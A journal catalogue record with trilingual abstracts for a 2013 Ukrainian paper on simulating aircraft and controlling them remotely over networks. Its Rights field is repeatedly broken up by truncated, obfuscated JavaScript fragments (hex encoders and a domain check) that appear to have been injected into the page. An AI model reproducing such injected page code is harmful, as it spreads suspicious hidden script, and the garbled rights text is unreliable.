Record Details

COMPUTER SIMULATION OF MODERN AIRCRAFTS BY USING NETWORK TECHNOLOGIES OF REMOTE CONTROL

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title COMPUTER SIMULATION OF MODERN AIRCRAFTS BY USING NETWORK TECHNOLOGIES OF REMOTE CONTROL
Компьютерное моделирование современных воздушных судов с использованием сетевых технологий отдалённого управления
Комп’ютерне моделювання сучасних повітряних суден із використанням мережевих технологій віддаленого керування
 
Creator Pavlov, Vadym; International Research and Training Center for Information Technologies and Systems,
National Academy of Sciences of Ukraine
Volkov, Oleksandr; International Research and Training Center for Information Technologies and Systems,
National Academy of Sciences of Ukraine
Voloshenyuk, Dmytro; International Research and Training Center for Information Technologies and Systems,
National Academy of Sciences of Ukraine
 
Subject
aircraft; computer modeling; remote control; safety; Web
681.518

безопасность полетов; компьютерное моделирование; летательный аппарат; сети; удаленное управление
681.518

безпека польотів; віддалене управління; комп’ютерне моделювання; літальний апарат; мережі
681.518
 
Description The problem of a computer simulation of modern aircraft and the use of new models and remote aircraft control (through the networks) to improve safety, especially in difficult circumstances and in conflict situations is considered in the paper
Исследованы актуальные вопросы компьютерного моделирования современных воздушных судов с применением сетевых технологий отдалённого управления. Предложено использовать компьютерную               3D-модель современного самолёта, учитывающую многие физически параметры, для разработки новых систем отдалённого управления и повышения безопасности полётов. Создана реально действующая модель самолёта, которая основана на физических параметрах воздушного судна и его аэродинамике. Разработана система отдалённого сетевого управления этой моделью. Показано, что применение таких технологий позволяет проводить исследования в области авиации. Отмечено, что при использовании данной модели воздушного судна и системы управления возникает возможность решения вопросов по устранению конфликтных ситуаций в воздухе, особенно, во время взлёта и посадки. Предусмотрена разработка новых систем посадки самолёта на основании технологий MLS (Microwave Landing System) для обеспечения наиболее экономичного и экологического режимов полёта. Рассмотрены технологии улучшения сетевых связей для уменьшения временных задержек и потери цифровых пакетов
Досліджено актуальні питання комп’ютерного моделювання сучасних повітряних суден з використанням мережевих технологій віддаленого управління. Запропоновано використовувати комп’ютерну 3D-модель сучасного літака, що враховує багато фізично параметрів, для розробки нових систем віддаленого управління та підвищення безпеки польотів. Створено реально діючу модель літака, яка заснована на фізичних параметрах літака і його аеродинаміці. Розроблено систему віддаленого мережевого управління цією моделлю. Показано, що застосування таких технологій дозволяє проводити дослідження в галузі авіації. Зазначено, що, використовуючи дану модель повітряного судна і систему управління, виникає можливість вирішення питань щодо усунення конфліктних ситуацій у повітрі, особливо, під час зльоту і посадки. Передбачено розробку нових систем посадки літака на підставі технологій MLS (Microwave Landing System) для забезпечення найбільш економічного та екологічного режимів польоту. Розглянуто технології поліпшення мережевих зв’язків для зменшення тимчасових затримок і втрати цифрових пакетів
 
Publisher National Aviation University
 
Contributor


 
Date 2013-12-30
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/5512
10.18372/2306-1472.57.5512
 
Source Proceedings of the National Aviation University; Том 57, № 4 (2013); 18-22
Вестник Национального авиационного университета; Том 57, № 4 (2013); 18-22
Вісник Національного Авіаційного Університету; Том 57, № 4 (2013); 18-22
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ